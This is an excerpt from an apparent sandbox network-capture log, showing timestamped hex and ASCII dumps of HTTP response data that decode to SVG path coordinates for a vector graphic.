                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10473INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10489INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10505INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10521INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10537INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10553INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10569INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                          Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11611INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11627INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11643INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11659INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11675INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11691INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                          Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11707INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11723INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                          Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11739INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11755INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
